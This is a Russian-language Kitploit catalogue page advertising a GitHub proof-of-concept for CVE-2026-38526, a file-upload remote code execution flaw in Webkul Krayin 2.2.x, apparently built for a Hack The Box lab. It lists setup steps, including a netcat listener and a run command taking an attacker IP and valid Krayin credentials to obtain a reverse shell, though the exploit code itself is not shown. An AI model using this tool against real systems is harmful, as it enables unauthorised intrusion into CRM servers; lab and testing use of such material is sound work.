Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2026-38526-PoC-htb-nexus — Скрипт PoC для CVE-2026-38526, RCE через уязвимость загрузки файлов в конечной точке /admin/tinymce/upload системы webkul krayin 2.2.x | Kitploit
Инструменты/GitHubGitHub/resolvdd/cve-2026-38526-poc-htb-nexus
Генерация полезной нагрузкиАнализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеRed Teaming
GitHubresolvdd/cve-2026-38526-poc-htb-nexus

CVE-2026-38526-PoC-htb-nexus

Скрипт PoC для CVE-2026-38526, RCE через уязвимость загрузки файлов в конечной точке /admin/tinymce/upload системы webkul krayin 2.2.x

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться
Репозиторий
1 месяц назадЕщё не проверено

CVE-2026-38526-PoC-htb-nexus

PoC-скрипт для CVE-2026-38526, удаленное выполнение кода (RCE) через уязвимость загрузки файлов в эндпоинте /admin/tinymce/upload веб-приложения webkul krayin 2.2.x (создан для htb-nexus)

🛠 Быстрый старт и использование

  1. Клонируйте репозиторий:
    root@kitploit:~
    git clone https://github.com/Resolvdd/CVE-2026-38526-PoC-htb-nexus.git
    cd CVE-2026-38526-PoC-htb-nexus
    
  2. Создайте виртуальное окружение Python:
    root@kitploit:~
    python3 -m venv .venv
    source .venv/bin/activate
    
  3. Установите зависимости из requirements.txt:
    root@kitploit:~
    pip install -r requirements.txt
    
  4. Запустите слушатель:
    root@kitploit:~
    nc -lvnp <номер-порта> (По умолчанию: 9001)
    
  5. Выполните скрипт:
    root@kitploit:~
    python3 poc.py -i <ваш-ip> -p <номер-порта-слушателя> -e <действительный-email-krayin> -P <действительный-пароль-krayin> -u <url-без-протокола По умолчанию: http>
    
Скачать инструмент